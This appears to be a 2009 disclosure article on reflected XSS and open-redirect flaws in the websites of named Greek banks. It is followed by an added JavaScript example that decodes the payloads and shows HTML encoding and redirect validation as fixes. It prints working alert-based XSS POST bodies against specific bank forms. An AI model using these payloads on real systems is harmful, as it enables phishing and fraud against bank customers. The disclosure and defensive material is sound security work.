Major Greek bank sites with SSL vulnerable to XSS and open redirects
Written by DP
Sunday, 10 May 2009
Security researcher "Hexspirit" has discovered multiple XSS and open redirect vulnerabilities affecting all major Greek bank websites.
Fraudsters can exploit these cross-site scripting flaws to mount convincing phishing attacks against e-banking customers and site visitors. Most of the affected pages are served over SSL, so script injected through a reflected parameter runs on the bank's own https origin: the browser shows the correct domain name and a valid certificate, and the padlock offers no warning. Security cannot be assured just by the presence of "https" at the start of a URL, or by checking that the browser address bar contains the correct domain name.
All the reported vulnerabilities were still exploitable at the time of writing; we hope they are fixed as soon as possible.
Greek Banks XSS Mirrors:
winbank.gr XSS Mirror (SSL)
POST: PBAccount=&HiddenPirAccount=&HiddenPrintMode=0&OtherAccount=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS%2F%29+%2F%3E&submit2=%C5%F0%E9%E2%E5%E2%E1%DF%F9%F3%E7
(the OtherAccount field decodes to <img src=k onerror=alert(/XSS/) />)
milleniumbank.gr XSS Mirror (no SSL)
POST: txtAccountNo=&_ctl0%3AtxtIBANCheck=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS%2F%29+%2F%3E&_ctl0%3AbtnCheckIBAN=%CE%88%CE%BB%CE%B5%CE%B3%CF%87%CE%BF%CF%82
(the _ctl0:txtIBANCheck field decodes to <img src=k onerror=alert(/XSS/) />)
probank.gr XSS Mirror (SSL)
proton.gr XSS Mirror (SSL)
protonbank.gr XSS Mirror (SSL)
eurobank.gr XSS Mirror (SSL)
POST: branch=3243&cd=43&main=%22%3Cimg+src%3D%22%22+onerror%3D%22write%28%27%3Cbody%3E%3Cb%3EHexspirit+was+here.+XSS+flaw.%3C%2Fb%3E%27%29%3Bclose%28%29%3Balert%28body.innerHTML%29%22+%2F%3E&account=&ibanspace=&source=
(the main field decodes to "<img src="" onerror="write('<body><b>Hexspirit was here. XSS flaw.</b>');close();alert(body.innerHTML)" />; the leading quote breaks out of an attribute value the field is reflected into)
nbg.gr Open redirect Mirror (SSL)
alpha.gr XSS Mirror (SSL)
bankofcyprus.gr Open redirect Mirror (no SSL)
ttbank.gr XSS Mirror
dias.com.gr XSS Mirror (no SSL)
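To make the list above concrete, here is an added example (not code from the article or from any of the banks named) that decodes the three POST bodies quoted above to show the reflected payload, contrasts a page that echoes a form field raw with one that HTML-encodes it, and adds the same-origin check that closes an open redirect of the kind reported for nbg.gr and bankofcyprus.gr. The render functions, the allowed origin `https://www.example-bank.gr` and the redirect targets are assumptions for illustration; only the form bodies are taken from the article.

```javascript
// Added example: decode the reported POST bodies, show the unsafe vs.
// encoded reflection, and validate a redirect target. Not the banks' code.

// application/x-www-form-urlencoded bodies as quoted in the article.
const WINBANK_BODY =
  "PBAccount=&HiddenPirAccount=&HiddenPrintMode=0&OtherAccount=" +
  "%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS%2F%29+%2F%3E" +
  "&submit2=%C5%F0%E9%E2%E5%E2%E1%DF%F9%F3%E7";
const MILLENNIUM_BODY =
  "txtAccountNo=&_ctl0%3AtxtIBANCheck=" +
  "%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS%2F%29+%2F%3E" +
  "&_ctl0%3AbtnCheckIBAN=%CE%88%CE%BB%CE%B5%CE%B3%CF%87%CE%BF%CF%82";
const EUROBANK_BODY =
  "branch=3243&cd=43&main=%22%3Cimg+src%3D%22%22+onerror%3D%22write%28%27" +
  "%3Cbody%3E%3Cb%3EHexspirit+was+here.+XSS+flaw.%3C%2Fb%3E%27%29%3B" +
  "close%28%29%3Balert%28body.innerHTML%29%22+%2F%3E&account=&ibanspace=&source=";

// Parse a form body and return every field whose decoded value carries an
// HTML tag. URLSearchParams does the '+' and percent decoding for us and
// replaces non-UTF-8 bytes (the Greek button labels) with U+FFFD.
function findInjectedFields(body) {
  const hits = [];
  for (const [name, value] of new URLSearchParams(body)) {
    if (/<[a-z]/i.test(value)) hits.push({ name, value });
  }
  return hits;
}

// Hypothetical server page that reflects a submitted field straight into
// the response body: the flaw class the article reports.
function renderUnsafe(fieldValue) {
  return `<p>Account: ${fieldValue}</p>`;
}

// HTML-encode the characters that can change context in text or in a
// quoted attribute value. This is the fix for the reflected fields above.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(fieldValue) {
  return `<p>Account: ${escapeHtml(fieldValue)}</p>`;
}

// True if the rendered page still contains a live img element.
function reflectsMarkup(html) {
  return /<img\s/i.test(html);
}

// Open-redirect guard: resolve the target against the site's own origin and
// only accept a path on that origin. Protocol-relative ("//evil"), foreign
// hosts, userinfo tricks ("https://bank@evil") and javascript: URLs all
// resolve to a different (or "null") origin and fall back to "/".
function safeRedirectTarget(rawTarget, allowedOrigin = "https://www.example-bank.gr") {
  let url;
  try {
    url = new URL(rawTarget, allowedOrigin);
  } catch {
    return "/";
  }
  if (url.origin !== allowedOrigin) return "/";
  return url.pathname + url.search; // drop fragment and any credentials
}

// Stand-alone demonstration.
for (const [site, body] of [["winbank", WINBANK_BODY], ["millennium", MILLENNIUM_BODY], ["eurobank", EUROBANK_BODY]]) {
  for (const hit of findInjectedFields(body)) {
    console.log(`${site}: field ${hit.name} -> ${hit.value}`);
    console.log("  raw echo executes:", reflectsMarkup(renderUnsafe(hit.value)));
    console.log("  encoded echo executes:", reflectsMarkup(renderSafe(hit.value)));
  }
}
for (const t of ["/accounts?x=1", "//evil.example/", "https://www.example-bank.gr@evil.example/", "javascript:alert(1)"]) {
  console.log(`redirect ${JSON.stringify(t)} -> ${safeRedirectTarget(t)}`);
}
```

The encoding in `escapeHtml` is enough for the two contexts the quoted payloads target (element text and a double-quoted attribute); a value reflected into a script block, a URL attribute or a CSS property needs the encoder for that context instead.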